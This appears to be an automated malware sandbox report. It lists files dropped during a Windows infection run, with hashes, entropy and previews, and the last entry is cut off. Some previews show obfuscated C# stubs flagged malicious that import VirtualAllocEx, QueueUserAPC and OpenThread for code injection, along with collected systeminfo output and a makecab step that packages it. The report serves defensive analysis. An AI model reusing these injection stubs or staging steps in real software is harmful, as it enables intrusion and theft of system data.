Preview:	R+gGuA3CjkMnlGMxKGeaGgyCIOMZM/vCBCaoBkMsHW1kKUczVLHZ55noSJne4DKdqe1Sx7BQX7RsWA9lsqVTiDWVbZw2C7YUuRa5umP9vJmyWkT+tdnc4NPYhfZQsW3TtsCJOJPhh3bPVZArKUVwu5bjxsjVWdC3PGKwtFQb1sQjOkOEWNGH4QgYPzS8qW2zV0rtQEOtyN+QEJmXO+rZ83MoFFSno62rBqCXP37HbErwZKTpV8li334hTX95qUh/df3l6GvSHII0MIOxPYngb3IVryiOpdGHA1YOTHmKpnanpVXNDYTSFcQspHruJ6FKnw/U3B8gEGA3yPjo2Ri86IiKGvY1UxQBXJajbvg9sfF7a0nazNkbvfSNtBsVDZlhyUFJjLdUxaiCt1zDZsyqc2RSqJ7acyGl6f7rwKHpWJRxRmoh8QL/n/6ke7mK5xzyTIoT6b0E2alpV2aaXhBv1mKy1Nwbkq8Y2GvEzRJd9Vm88yrKN85CSaQCUBLlpHHzdSWqMArKjdrq3I5fCvWJ29q5M0/uTftG1L+OTmYVNNYnbsNXRPCC6z/kzdIZR7nsSts1W0UgXZU0VrxukC2fu09gGI8Mpa2ahmh0v/SxqfwWAvKVYZQsPCxCvUwdJHGMgtFsW00mR40RKu7HCBQl+PnGzPuWb4BKQCpECyecYrvkoauXc74zWD0Mpblf4HOQaK+bUudnKaD0M4dS+2NFOhwEWm1okFHOMXkAarpd4/hx8j/IVdiqXiPdBDGM3xuVBVvKCr3o39Yb8FAwy5vAPAj/Mj5NxtWQTCh0wPUigk8bgK4s9AA4nGFJr2o58hRVJZK1lL1NKGrs8HZv2gg8/lKqyP6fjkTllp8+Jcux8ILaeBnJBkHSdzlyX+5pBIkUpIuw0QEVDeY/LXADWzIqSGpXUZFd1BzToBAeo6hyxE1udgxnxMFfKCwx+KMQADsMnRt6nBuXFC0q00kPEzHdyDOjeDEAeMB6aYvg1r5+

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\fLzp[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	295688
Entropy (8bit):	5.999867070037125
Encrypted:	false
SSDEEP:	6144:CK1T2eeslkv/VfQWVVKJrTPfuBRlBnQUAOGrWbqF:J61IANfQhZmrQRrmY
MD5:	E3AA1B0A45CDE8D23A403F8A2FE8927A
SHA1:	8723BF1632C9A15FA219DEADC680237FEB3011B2
SHA-256:	76B2A1910AAE8E7E2DA72985A300364B0877360454F856378F4366FFEDA8B2F3
SHA-512:	B7D6B93EC311479F0C87CF09BFE59B069CE9158608442D73BA424A934ACF652BE47C07F010F902179DA789D457B4972BA76B2E4A4E2D9CB9A864B1B5985E6F2A
Malicious:	false
Preview:	02iCu1qRlUynr0bTRvBnRXt9mmVVbv+10uq6egmqstjKPxb4WPkUmH6VbshNGNFe3r3LWWXGjI7wQ/W8sgJRRTD/UmBUWMFJ5lXJRCuWLG4ooaEpQbtarXnEcCqXZkxacyIWqb8gQXrIg0/MZDFYYZs3G/jf3uUYyaYM1l4rJLJHbtkwzk2TvySuRnQQp0q1IeohIEQLRNu7NQBjFUuQk1eAXq7bC4r96tn1lYzwS9hfl11O09VvPj7+lARBEnDD5z4fqakWY2u2sChRyNn28ZWatOXKoDS3wNMzzxmjZS38dmHKFl2YD8q5X3GV5GGjCysbvtHn0GZc7bixwwsuQUmGFG/jjX+8n9ute21jdOnSKM+pEWkJxzQW7kqhY6XqiaGwnep3Sr0IsDBNeqZQUWx3HuNzHTA4CbAS6ci/YDX7QVXdlohg4pAPax0uJkXTW5U1HsJfyImlnwki70ydbPrPD4KrXbtLF4paI+u9AuJqE+bDhe8EPCEEoegqliw/6+ZSFVD0gYpYwMj9nKL6OssWbto/rXFNlNhWZDBoDoHRcIwEut/J1+bbLkNe3LDshxHKI4GV9TqfLy3EdUz8KSt31xyNp3wmFsXY0Zu3UCI15s51+ZLDgQou7kcEsjV+CdnpcFeQMfS0s6XuvjjQ/I8hXECA5TMM/7IelrdeIwbzp18lP9slLeyizirYuxfF8Ow7ClR7t2bGi9+adpy8Bge8bUZpT9jT70d019FZndQxWQwR2a34DANgaykZyN8kHwHLH9vUTOf03Mc9N9Txq8kC57xTgiUtuwgdLMIUAP84xodLpbZrj/kSHZ8vaDz9xYcFfBFzEX9VQ8BaeBAkRJpHd9HxhL0acpwKvwKo5vS2xHKMXuEYpa82x8N9w3Z72moYsKx8NWFJUi6GnK9rCe8yjrk1gIzEZswsTDXPTvto97TDsB+6M75Fxwm71pr1V7b2hHSBclM+sS+J1P5nNl76hrbM8n+rfXwXqZgQ

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\googlelogo_color_150x54dp[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 150 x 54, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	3170
Entropy (8bit):	7.934630496764965
Encrypted:	false
SSDEEP:	96:c2ZEPhMXQnPkVrTEnGD9c4vnrmBYBaSfS18:c2/XQnPGroGD9vvnXVaq
MD5:	9D73B3AA30BCE9D8F166DE5178AE4338
SHA1:	D0CBC46850D8ED54625A3B2B01A2C31F37977E75
SHA-256:	DBEF5E5530003B7233E944856C23D1437902A2D3568CDFD2BEAF2166E9CA9139
SHA-512:	8E55D1677CDBFE9DB6700840041C815329A57DF69E303ADC1F994757C64100FE4A3A17E86EF4613F4243E29014517234DEBFBCEE58DAB9FC56C81DD147FDC058
Malicious:	false
Preview:	.PNG........IHDR.......6.....%.`....)IDATx..].pT..>.l......b..(Hv7 D7.n.8....V..H_.R;S.hY`w.(...N_R."0`.-.A..\|.N..`....n..{.&..l.o..;.....a....d..$.................J.1......7+.c...o..T/.~V.r.....D..G.Ic.....E_.FUR.&..U%...X.4!!Q.H";......e(Ic...$..."1..jR[.L..../Ek.}AH...W.L.V....Y..S..q...!._r.D....G,%...Hu.$q..\.j.x...G.....]....B.i.I.+B.....Hu.....Q...K;...J.q..._......_.x....A:......j....:c...^.....k=GIj..Y]B.V..m...Y.\....$..!....+.R%..U/;p.....R4.g.R...XH.3%..JHHby.eqOZdnS..$.. ....dn...$.w....E.o.8...b@.z.)5.L4\|.F...9......pP.8.\|....-.M..:..ux...7.]...'..(q..~.....KQ.W..,b..L<.Y.].V+....t4.$.V.O.....D.5..v.j...Hd.M....z.......V..q.p.......;:.J.%2.G.;./.E...!.H. ..../Dk.8.T....+..%Vs4..DC.R.`..Z..........0.[)N!.....%.>&.b.$.M....P.!...!....'Kv..Nd...mvR.:.L....w..y%.i..H..u....s.Se1.[.)."..)%.I.....(.#M..4.@....#.....X..P<...k..g....O..I..>-...'._.Q..T.y.=Z.GR{]..&t}......>J..!,..X6.HC..$.:.}..z...._b.b.4.E.....;.Ha.?s.

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	11606
Entropy (8bit):	4.883977562702998
Encrypted:	false
SSDEEP:	192:Axoe5FpOMxoe5Pib4GVsm5emdKVFn3eGOVpN6K3bkkjo5HgkjDt4iWN3yBGHh9sO:6fib4GGVoGIpN6KQkj2Akjh4iUxs14fr
MD5:	1F1446CE05A385817C3EF20CBD8B6E6A
SHA1:	1E4B1EE5EFCA361C9FB5DC286DD7A99DEA31F33D
SHA-256:	2BCEC12B7B67668569124FED0E0CEF2C1505B742F7AE2CF86C8544D07D59F2CE
SHA-512:	252AD962C0E8023419D756A11F0DDF2622F71CBC9DAE31DC14D9C400607DF43030E90BCFBF2EE9B89782CC952E8FB2DADD7BDBBA3D31E33DA5A589A76B87C514
Malicious:	false
Preview:	PSMODULECACHE......P.e...S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........7r8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1192
Entropy (8bit):	5.325275554903011
Encrypted:	false
SSDEEP:	24:3aEPpQrLAo4KAxX5qRPD42HOoFe9t4CvKaBPnKdi5:qEPerB4nqRL/HvFe9t4CvpBfui5
MD5:	C85C42A32E22DE29393FCCCCF3BBA96E
SHA1:	EAF3755C63061C96400536041D4F4EB8BC66E99E
SHA-256:	9022F6D5F92065B07E1C63F551EC66E19B13E067C179C65EF520BA10DA8AE42C
SHA-512:	7708F8C2F4A6B362E35CED939F87B1232F19E16F191A67E29A00E6BB3CDCE89299E9A8D7129C3DFBF39C2B0EBAF160A8455D520D5BFB9619E4CDA5CC9BDCF550
Malicious:	false
Preview:	@...e................................................@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP...............-K..s.F..*.]`.,......(.Microsoft.PowerShell.Commands.ManagementD..................-.D.F.<;.nt.1........System.Configuration.Ins

C:\Users\user\AppData\Local\Temp\00wddsye\00wddsye.0.cs Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text
Category:	dropped
Size (bytes):	419
Entropy (8bit):	4.997707193786489
Encrypted:	false
SSDEEP:	6:V/DsYLDS81zuJz/WmMRSRa+eNMjSSRrxgLaSRHq1ff+hAQKKE7y:V/DTLDfuH9eg5rmLBuffEg7y
MD5:	5B17B009281A3C8C532B0BB82B8B44F0
SHA1:	BB6C2DDED8AE33AB8D0AB7A01FEAFC11C0EC0D4C
SHA-256:	4BAFA02A0D8F4179EFFD80C32D96C3DC700E83002EFFEAA97794B80E083CFA33
SHA-512:	A45F45C2F466CA2F203C54C3C11FD8E77ADD590F3F72A6D6395F3DF3612899D54DB789FA047C326CA1E34A29760D9D55E86D081419179D3204D6C9776EA487AE
Malicious:	true
Preview:	.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class eqmvoaih. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint lsjsrscb,uint irib);.[DllImport("kernel32")].public static extern IntPtr VirtualAllocEx(IntPtr ienlcmu,IntPtr rnvtvsfn,uint jqngty,uint apgwnlqwjfu,uint opfyhknyg);.. }..}.

C:\Users\user\AppData\Local\Temp\00wddsye\00wddsye.cmdline Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	371
Entropy (8bit):	5.1769110311873945
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923f3XUzxs7+AEszI923f3B:p37Lvkmb6KzvXUWZE2vB
MD5:	D5DB76AA0916B868C4A3BC4FA12C8706
SHA1:	7E3FA41B6660E6E06B40DC2AA957531D3C961696
SHA-256:	E5EC25B991A44F20CF1C23AC93695D2951D91548D6452381360F878879B0BA14
SHA-512:	7CF3C5EB27B58AC920DE960A25B51C493F823732ED73D77DC469F443055493A7A0C4433E53F3146349E7DC42D50B484EE6ED2E2564540B8DE3D3DEFB6AA3AA99
Malicious:	false
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\00wddsye\00wddsye.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\00wddsye\00wddsye.0.cs"

C:\Users\user\AppData\Local\Temp\00wddsye\00wddsye.dll Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3584
Entropy (8bit):	2.6307189583700343
Encrypted:	false
SSDEEP:	24:etGSoMWWEevy8MTnIgQUXsCqdWVfWtkZf2EOHI+ycuZhNquGakStuXPNnq:6q7CMTIgQUcBWVfZJ2EI1ulqxa3tKq
MD5:	F7BDA195E03EC89E7B55B289BC7E858D
SHA1:	CE32B5F29B4962F26E9B5E6EB6AB104AE9BDB8DB
SHA-256:	5939DA07D6C932A2E24B6022E866D102D39F829F956E91304CCDF56D44D5EC4B
SHA-512:	55051B01068F7E90A1A962A5995B26D4EB32424C2748B8D94B7D17B9FDACF5406E41BEAB872176034B31133149EE431964725EB459AC55FE9C0A4E3A04C9EB30
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....[._...........!.................$... ...@....... ....................................@..................................#..S....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....*BSJB............v4.0.30319......l...P...#~......H...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................4.-...............,....................... .............. ;............ M............ U.....P ......d.........j.....s.....x...........................d.!...d...!.d.&...d.......+.....4.?.....;.......M.......U.......................................$..........<Module>.00wddsye.dll.eqmvoaih.W32.

C:\Users\user\AppData\Local\Temp\00wddsye\00wddsye.out Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	modified
Size (bytes):	412
Entropy (8bit):	4.871364761010112
Encrypted:	false
SSDEEP:	12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
MD5:	83B3C9D9190CE2C57B83EEE13A9719DF
SHA1:	ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
SHA-256:	B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
SHA-512:	0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
Malicious:	false
Preview:	Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\00wddsye\CSCFFAD43D2FB2747A5BC1271AB7CCA8A12.TMP Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.0745408883199463
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grycTaGak7YnqqtTaXPN5Dlq5J:+RI+ycuZhNquGakStuXPNnqX
MD5:	CE8B97BFEC39B9FE6E7E346212202E3A
SHA1:	3B4D9687D96DEBC289E1143973DC5DFF58B511F0
SHA-256:	BC3CC5841C2B368C2655853F9A6E7913038B061D84891CBA78EA9A28F0695CDD
SHA-512:	FDAB86A6797FB49535CA227A68296721C2B7D1A839E8C0C7AFDE883135D2FF001EE6A89ED1CFFEE8B2DD45C77003997B4CFB4293B8A5CA2A4832FAE46E30A7DB
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...0.0.w.d.d.s.y.e...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...0.0.w.d.d.s.y.e...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\44E8.bin Download File
Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	51796
Entropy (8bit):	4.000114248193379
Encrypted:	false
SSDEEP:	1536:y+ztB8vPJrb21JHChPZDm5F/Xuz8FqXgMHpkfC7CmmEL57zfrUh21jubpKYEP6pS:y+o39PJ
MD5:	8C6AE88C334083F7E4B921E54C79A7AA
SHA1:	FD94AD0FD8824D43B1A648BE0975C9F66E27F174
SHA-256:	0556AF85314AA8BDC2869BF3565FA07999A6F17102DFFF538FAF22E0D676FDAA
SHA-512:	B48BE6F17D10EEC5C45878A22FB1F6FDD37D62C576568C09084601893D814607E511BD91AE4C7C93378FA39C9C83794660309135DF2ABA20106BD6221D99BF95
Malicious:	false
Preview:	..Host Name: 320946..OS Name: Microsoft Windows 10 Pro..OS Version: 10.0.17134 N/A Build 17134..OS Manufacturer: Microsoft Corporation..OS Configuration: Standalone Workstation..OS Build Type: Multiprocessor Free..Registered Owner: pratesh..Registered Organization: ..Product ID: 00330-71388-77023-AAOEM..Original Install Date: 4/29/2019, 3:24:22 AM..System Boot Time: 12/16/2020, 9:52:56 AM..System Manufacturer: Gx7cc1ecBLSwVFs..System Model: h4euB5Z3..System Type: x64-based PC..Processor(s): 1 Processor(s) Installed... [01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2195 Mhz..BIOS Version: C71L1 46A46, 6/19/2019..Windows Directory: C:\Windows..System Directory: C:\Windows\system32..Boot Device: \Device\HarddiskVolume2..System Locale: e

C:\Users\user\AppData\Local\Temp\6B30.bin Download File
Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	155
Entropy (8bit):	4.9912184757240246
Encrypted:	false
SSDEEP:	3:tFoYXBsJaQGQbUkh4E2J5xAIkLW0HbRQ9Z1c/1Ukh4E2J5xAI8gzov:tFdXBW923fCvVQ9Li923f8gG
MD5:	5E9DCEFCDBCA6B7DA551690911D7365C
SHA1:	FDFB91978207F4BB6D565287476644FF16E4B667
SHA-256:	D14C2A580CF19E66086D93C412CD734D6DDA766000D7B83D7D877598581B05D3
SHA-512:	0AD040AC0D450DE6C42459A93528EC6851C7C90AE46CF6FDD968D1688CCE8A715EBB1AABD04E80AAFA9A6942084997302756D92692824887F6B54C08501372AF
Malicious:	false
Preview:	.set MaxDiskSize=0...set DiskDirectory1="C:\Users\user\AppData\Local\Temp"...set CabinetName1="73D4.bin".."C:\Users\user\AppData\Local\Temp\44E8.bin"..

C:\Users\user\AppData\Local\Temp\JavaDeployReg.log Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	89
Entropy (8bit):	4.305703274257315
Encrypted:	false
SSDEEP:	3:oVXVP6miH8JOGXnFP6m4n:o9Uq2
MD5:	4E969BAF058176DA714CD97A4E6E7303
SHA1:	0D1BF79EF3B3D459D2CFB3B2E24CA17767B63304
SHA-256:	5F357770A6D4EAF945ED7ED375E2496963BDD739B9AA3688911972B5B1BA9809
SHA-512:	8632F83679F48647BD291B3AF2370AB4C6F4C2CCD5036C2AFC850A48E993275BDC8D059E6EE2A59939DE7DFD7D0B9CE3E18C4A7699C605328C0B8B9FE5DEE1FB
Malicious:	false
Preview:	[2020/12/16 11:07:36.007] Latest deploy version: ..[2020/12/16 11:07:36.007] 11.211.2 ..

C:\Users\user\AppData\Local\Temp\RES9CA2.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	data
Category:	dropped
Size (bytes):	2188
Entropy (8bit):	2.7087089550221406
Encrypted:	false
SSDEEP:	24:Binb2uHehKdNnI+ycuZhNrakStPNnq92pazW9I:B2b2uUKdV1ulra33q95
MD5:	646193E76577CCC753B4CE90403663D5
SHA1:	629B448899C18B2358E9F3AF96D63E99EC0CF956
SHA-256:	A0AC22321D8C8231D2A2D0CEBDBC11C32E77A8C516D1EB5FC2DDD17CD7989255
SHA-512:	6CA4292D1F5A7D8E85CF13E7F5A9D43D28110B04C47C5E8EBE5B6FB613D8B92A966C23ADF0F9CC50F85075B2237F5C4251FD80EC222A6C450A4A14D3E2DCFDD4
Malicious:	false
Preview:	........U....c:\Users\user\AppData\Local\Temp\lcbc4odh\CSCECDBA1D9933D457DB056F31AC2CEEADE.TMP..................hi...6....K...........5.......C:\Users\user\AppData\Local\Temp\RES9CA2.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\RESABD5.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	data
Category:	dropped
Size (bytes):	2188
Entropy (8bit):	2.697614935422835
Encrypted:	false
SSDEEP:	24:BuX5qHuH5hKdNnI+ycuZhNquGakStuXPNnq92p+zW9I:BiEunKdV1ulqxa3tKq9t
MD5:	C93CE04B7972FD9EF43BA2CEAA942C62
SHA1:	4BAE01C46539FBADCD9552B01C8303EAF41002F2
SHA-256:	74ABFD1903A530A7EB5E67993D7200E84097F574507955B08462C68DBE454C06
SHA-512:	5AFBCE4E537B31B257652F2D1FD8ABA94C8B0DA0C2085841E2FED5F2C2B609CD45D33C376FCA28101C8E4610536B50EB38ECEA351C986B1AA49907F0649FE8A5
Malicious:	false
Preview:	........U....c:\Users\user\AppData\Local\Temp\00wddsye\CSCFFAD43D2FB2747A5BC1271AB7CCA8A12.TMP......................9..n~4b. .:..........5.......C:\Users\user\AppData\Local\Temp\RESABD5.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ik2yfqgt.wtx.psm1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_urtj1ih0.gmi.ps1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\lcbc4odh\CSCECDBA1D9933D457DB056F31AC2CEEADE.TMP Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.0866212324722624
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryh4oak7Ynqq649PN5Dlq5J:+RI+ycuZhNrakStPNnqX
MD5:	6869D7FCD6369BC5A7E685F19B844BC4
SHA1:	C974FEF2EECBD33317D0AC503E0DFAFE808A960D
SHA-256:	A282B837D32464FEEA2EB81EDF8E6726035638195E00A2FEB03D71827BDF3420
SHA-512:	308448EDC8452BD72FD7A8392086DA9E91B651A1AF8C9E5961596CB304752BD8373651442D018B8917381037F8C95E15B70D653045E9B92067C313E890DEB42A
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...l.c.b.c.4.o.d.h...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...l.c.b.c.4.o.d.h...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\lcbc4odh\lcbc4odh.0.cs Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text
Category:	dropped
Size (bytes):	405
Entropy (8bit):	4.984620357660008
Encrypted:	false
SSDEEP:	6:V/DsYLDS81zuJI9MRSR7a1WSvctVSRa+rVSSRnA/fri6Qy:V/DTLDfuq9dxU9rV5nA/DOy
MD5:	655283EF891D5B9C591ABE78702B0670
SHA1:	3F237A5F247A04C17E8BA74A2E6DC3D57BCFC27D
SHA-256:	E3A387CCA453522A3BE7B0F258B49F7B56E9BAF62BB1EF6FEC6233EBDE53001A
SHA-512:	F5C6452841DA5A56E6865DB14F1A628513E565C1030627F011CFDD91784FB5AB1A1BA0E8F26D879132281775AD3D8681638C49CE6E45929506C966623198E2C1
Malicious:	false
Preview:	.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class qvpflp. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr vsskier,IntPtr xfsuntl,IntPtr uxdbet);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint ynvfantucd,uint mjyb,IntPtr alejdeb);.. }..}.

C:\Users\user\AppData\Local\Temp\lcbc4odh\lcbc4odh.cmdline Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	371
Entropy (8bit):	5.223453522425836
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923fBs0GsOzxs7+AEszI923fBs0GsYA:p37Lvkmb6Kzi/sOWZE2i/sD
MD5:	B31CA3CD3DB9B51042C8F6B5CCC15B20
SHA1:	B01E8F68B356075C5077F3B1427DC903C50F2940
SHA-256:	309AE6C65520A889B0AAC8D01A80013A78908CCAED67CD10A24E404AD489B50A
SHA-512:	3BC2A47DE603616EEFE438CAC78F1AE4CD1D5DE89345C5E5B961EB6136E8ED0193343480732B9EED5AD8B97AB3832D04469C276129B5FB2EBD87375FA16EEA78
Malicious:	true
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\lcbc4odh\lcbc4odh.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\lcbc4odh\lcbc4odh.0.cs"

C:\Users\user\AppData\Local\Temp\lcbc4odh\lcbc4odh.dll Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3584
Entropy (8bit):	2.614850904038567
Encrypted:	false
